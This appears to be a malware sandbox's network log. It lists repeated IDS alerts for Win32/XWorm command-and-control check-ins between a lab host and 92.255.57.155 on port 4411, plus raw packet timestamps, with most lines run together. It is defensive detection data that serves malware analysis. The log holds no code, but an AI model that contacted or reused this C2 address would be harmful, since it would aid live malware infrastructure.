2024-12-18T08:16:28.556971+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:16:28.562810+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49739 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:28.746780+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:16:29.168287+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:16:29.359151+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:16:29.424415+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:16:29.550152+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:16:29.736027+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
2024-12-18T08:16:29.829091+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.6 | 49739 | TCP
                                  2024-12-18T08:16:29.897905+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:30.047995+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:30.164397+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:30.164514+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:30.213412+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:30.355330+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:30.359257+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:31.212079+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:31.356071+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:31.404817+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:31.476788+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:31.524481+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:31.595467+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:31.646166+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:31.723220+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:31.906559+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:31.937571+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:32.128606+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:32.133889+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:32.360490+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:32.362180+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:32.444462+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:32.481784+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:33.135361+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:33.186441+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:33.326236+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:33.417459+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:33.446302+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:33.517294+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:33.637143+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:33.697480+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:33.828222+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:33.835284+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:33.947863+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:33.997584+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:34.008216+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:34.117799+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:34.138848+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:34.240500+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:35.439400+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:35.482478+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:35.630348+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:35.793268+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:35.822385+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:35.984120+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:36.010043+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:36.077256+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:36.130660+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:36.442149+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:36.490754+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:36.778303+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:36.781610+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:38.640407+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:38.748427+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:38.767572+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:38.909410+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:38.939562+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:39.029084+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:39.130433+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:39.148733+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:39.220304+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:39.268439+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:41.203799+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:41.205722+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:43.056545+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:43.072733+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:43.247444+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:43.253090+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:44.203380+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:44.248195+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:44.394156+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:44.558782+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:44.585112+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:44.870997+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:44.893943+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:45.065225+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:45.069824+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:45.204642+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:45.207454+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:45.388131+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:45.492026+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:47.047441+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:47.049893+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:47.237899+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:47.244129+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:47.361006+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:47.364366+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:48.829767+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:48.867349+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:49.068332+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:49.070621+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:50.452758+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:50.578931+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:50.763690+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:50.781213+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:50.959334+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:51.270231+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:51.321655+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:51.731575+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:51.735444+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:52.765459+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:53.137525+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:53.138080+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:53.138802+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:53.267219+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:53.361065+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:53.552143+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:53.644963+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:54.377471+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:54.391343+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:54.567651+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:54.616929+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:55.861018+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:55.862312+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:56.460091+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:56.530712+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:56.901212+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:56.909860+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:57.089201+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:57.223265+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:57.369442+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:58.044230+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:58.296589+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:58.298171+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:58.724805+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:58.726092+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:58.969995+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:16:59.106524+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:16:59.107296+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:00.254126+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:00.294866+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:00.444796+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:00.565009+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:00.875375+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:00.971617+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:00.994906+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:01.448153+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:01.537876+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:01.567748+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:01.639169+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:01.642038+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:01.703951+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:01.727953+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:01.823599+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:02.719202+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:02.952185+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:02.961974+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:03.029984+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:03.082053+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:03.143231+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:03.201778+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:03.268126+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:03.326101+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:03.512566+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:03.613897+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:03.771577+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:03.773877+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  2024-12-18T08:17:04.443381+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:04.704070+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.649739TCP
                                  2024-12-18T08:17:04.749398+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64973992.255.57.1554411TCP
                                  Dec 18, 2024 08:16:44.248132944 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:44.248194933 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:44.367644072 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:44.367698908 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:44.394155979 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:44.533179045 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:44.533237934 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:44.558782101 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:44.585112095 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:44.585256100 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:44.652797937 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:44.653115034 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:44.704734087 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:44.772656918 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:44.772711992 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:16:44.870996952 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:16:44.892220020 CET44114973992.255.57.155192.168.2.6
